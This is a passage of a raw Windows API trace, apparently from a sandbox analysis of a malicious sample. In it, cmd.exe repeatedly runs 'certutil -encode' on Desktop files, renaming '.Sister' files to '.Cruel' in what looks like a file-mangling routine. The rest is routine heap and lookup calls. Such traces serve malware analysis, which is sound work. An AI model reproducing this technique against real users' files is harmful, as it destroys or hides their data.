\"2QVQiUvIc2zuhpxx-t.mp4.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"2QVQiUvIc2zuhpxx-t.mp4.Sister\" \"2QVQiUvIc2zuhpxx-t.mp4.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"2QVQiUvIc2zuhpxx-t.mp4.Sister\" \"2QVQiUvIc2zuhpxx-t.mp4.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x4ec, dwThreadId=0x36c)) returned 1 [0212.487] CloseHandle (hObject=0xa8) returned 1 [0212.487] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.487] GetProcessHeap () returned 0x21ed8c70000 [0212.487] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0212.487] GetEnvironmentStringsW () returned 0x21ed9980080* [0212.488] GetProcessHeap () returned 0x21ed8c70000 [0212.488] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0212.488] FreeEnvironmentStringsA (penv="=") returned 1 [0212.488] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0214.665] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0214.665] CloseHandle (hObject=0xa4) returned 1 [0214.665] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0214.665] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.665] GetProcessHeap () returned 0x21ed8c70000 [0214.665] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0214.666] GetEnvironmentStringsW () returned 0x21ed9980080* [0214.666] GetProcessHeap () returned 0x21ed8c70000 [0214.666] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0214.666] FreeEnvironmentStringsA (penv="=") returned 1 [0214.666] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.666] GetProcessHeap () returned 0x21ed8c70000 [0214.666] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0214.666] GetEnvironmentStringsW () returned 0x21ed9980080* [0214.666] GetProcessHeap () returned 0x21ed8c70000 [0214.666] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0214.666] FreeEnvironmentStringsA (penv="=") returned 1 [0214.666] GetProcessHeap () returned 0x21ed8c70000 [0214.666] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95720) returned 1 [0214.666] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0214.666] ??_V@YAXPEAX@Z () returned 0x1 [0214.666] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b737120, ftCreationTime.dwHighDateTime=0x1d5f009, ftLastAccessTime.dwLowDateTime=0x2037c380, ftLastAccessTime.dwHighDateTime=0x1d5ed36, ftLastWriteTime.dwLowDateTime=0x2037c380, ftLastWriteTime.dwHighDateTime=0x1d5ed36, nFileSizeHigh=0x0, nFileSizeLow=0xf6b1, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="33_iBLAi.mp3.Sister", cAlternateFileName="")) returned 1 [0214.666] GetProcessHeap () returned 0x21ed8c70000 [0214.666] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95c40, Size=0x12c) returned 0x21ed8c95de0 [0214.666] GetProcessHeap () returned 0x21ed8c70000 [0214.666] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95de0) returned 0x12c [0214.667] GetProcessHeap () returned 0x21ed8c70000 [0214.667] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a310 [0214.667] GetProcessHeap () returned 0x21ed8c70000 [0214.667] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a310, Size=0x58) returned 0x21ed937a310 [0214.667] GetProcessHeap () returned 0x21ed8c70000 [0214.667] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a310) returned 0x58 [0214.667] GetProcessHeap () returned 0x21ed8c70000 [0214.667] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a380 [0214.667] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0214.667] GetProcessHeap () returned 0x21ed8c70000 [0214.667] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8ad0 [0214.667] ??_V@YAXPEAX@Z () returned 0x1 [0214.667] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0214.667] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ca60 [0214.667] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0214.668] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ce80 [0214.668] FindClose (in: hFindFile=0x21ed8c7ce80 | out: hFindFile=0x21ed8c7ce80) returned 1 [0214.668] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xaa75f597, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xaa75f597, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cb80 [0214.668] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0214.668] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\33_iBLAi.mp3.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b737120, ftCreationTime.dwHighDateTime=0x1d5f009, ftLastAccessTime.dwLowDateTime=0x2037c380, ftLastAccessTime.dwHighDateTime=0x1d5ed36, ftLastWriteTime.dwLowDateTime=0x2037c380, ftLastWriteTime.dwHighDateTime=0x1d5ed36, nFileSizeHigh=0x0, nFileSizeLow=0xf6b1, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="33_iBLAi.mp3.Sister", cAlternateFileName="33_IBL~1.SIS")) returned 0x21ed8c7d060 [0214.668] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0214.668] _wcsnicmp (_String1="33_IBL~1.SIS", _String2="33_iBLAi.mp3.Sister", _MaxCount=0x13) returned 29 [0214.668] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0214.668] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0214.669] GetProcessHeap () returned 0x21ed8c70000 [0214.669] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2a) returned 0x21ed8cc8cd0 [0214.669] ??_V@YAXPEAX@Z () returned 0x1 [0214.669] ??_V@YAXPEAX@Z () returned 0x1 [0214.669] GetProcessHeap () returned 0x21ed8c70000 [0214.669] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a380, Size=0x1b0) returned 0x21ed937a380 [0214.669] GetProcessHeap () returned 0x21ed8c70000 [0214.669] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a380) returned 0x1b0 [0214.669] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0214.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.669] GetFileType (hFile=0x50) returned 0x2 [0214.669] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.669] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0214.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.670] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0214.678] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0214.678] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0214.678] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0214.678] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0214.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.678] GetFileType (hFile=0x50) returned 0x2 [0214.678] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.678] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0214.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.679] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0214.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.679] GetFileType (hFile=0x50) returned 0x2 [0214.679] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.679] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0214.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.681] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed937a320*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed937a320*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0214.681] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"33_iBLAi.mp3.Sister\" \"33_iBLAi.mp3.Cruel\" ") returned 52 [0214.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.681] GetFileType (hFile=0x50) returned 0x2 [0214.681] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.681] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0214.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.682] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x34) returned 1 [0214.682] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0214.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.682] GetFileType (hFile=0x50) returned 0x2 [0214.682] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.682] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0214.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.683] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0214.688] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0214.688] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0214.688] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0214.688] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0214.688] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0214.688] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0214.688] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0214.693] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0214.693] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0214.693] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0214.693] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0214.693] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0214.693] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0214.693] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0214.693] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0214.693] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0214.693] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0214.693] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0214.693] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0214.693] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0214.693] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0214.693] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0214.693] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0214.693] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0214.693] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0214.693] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0214.693] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0214.693] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0214.693] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0214.693] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0214.693] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0214.693] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0214.693] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0214.693] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0214.693] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0214.693] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0214.693] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0214.693] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0214.694] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0214.694] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0214.694] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0214.694] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0214.694] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0214.694] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0214.694] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0214.694] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0214.694] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0214.694] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0214.694] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0214.694] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0214.694] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0214.694] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0214.694] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0214.694] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0214.694] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0214.694] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0214.694] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0214.694] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0214.694] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0214.694] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0214.694] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0214.694] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0214.694] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0214.694] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0214.694] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0214.694] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0214.694] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0214.694] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0214.694] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0214.694] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0214.695] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0214.695] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0214.695] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0214.695] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0214.695] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0214.695] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0214.695] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0214.695] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0214.695] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0214.695] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0214.695] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0214.695] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0214.695] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0214.695] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0214.695] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0214.695] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0214.695] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0214.695] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0214.695] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0214.695] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0214.695] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0214.695] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0214.695] ??_V@YAXPEAX@Z () returned 0x1 [0214.695] GetProcessHeap () returned 0x21ed8c70000 [0214.695] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93a0140 [0214.696] GetProcessHeap () returned 0x21ed8c70000 [0214.696] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8a) returned 0x21ed8d65750 [0214.696] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0214.696] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0214.696] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0214.696] GetProcessHeap () returned 0x21ed8c70000 [0214.696] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8c96fb0 [0214.696] SetErrorMode (uMode=0x0) returned 0x0 [0214.696] SetErrorMode (uMode=0x1) returned 0x0 [0214.696] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8c96fc0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0214.696] SetErrorMode (uMode=0x0) returned 0x1 [0214.696] GetProcessHeap () returned 0x21ed8c70000 [0214.696] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c96fb0, Size=0x52) returned 0x21ed8c96fb0 [0214.697] GetProcessHeap () returned 0x21ed8c70000 [0214.697] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c96fb0) returned 0x52 [0214.697] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0214.697] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.697] GetProcessHeap () returned 0x21ed8c70000 [0214.697] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d64a30 [0214.697] GetProcessHeap () returned 0x21ed8c70000 [0214.697] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d637f0 [0214.697] GetProcessHeap () returned 0x21ed8c70000 [0214.697] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d637f0, Size=0x1be) returned 0x21ed8d637f0 [0214.697] GetProcessHeap () returned 0x21ed8c70000 [0214.697] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d637f0) returned 0x1be [0214.697] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.697] GetProcessHeap () returned 0x21ed8c70000 [0214.697] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c95c40 [0214.697] GetProcessHeap () returned 0x21ed8c70000 [0214.697] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95c40, Size=0x7e) returned 0x21ed8c95c40 [0214.697] GetProcessHeap () returned 0x21ed8c70000 [0214.697] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95c40) returned 0x7e [0214.697] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.697] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0214.698] GetLastError () returned 0x2 [0214.698] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.698] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0214.698] GetLastError () returned 0x2 [0214.698] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.698] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0214.699] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0214.699] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0214.699] GetLastError () returned 0x2 [0214.699] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cee0 [0214.699] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0214.699] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0214.699] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0214.699] ??_V@YAXPEAX@Z () returned 0x1 [0214.699] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0214.700] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0214.700] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0214.700] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0214.700] GetProcessHeap () returned 0x21ed8c70000 [0214.700] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e00 [0214.700] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0214.701] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", 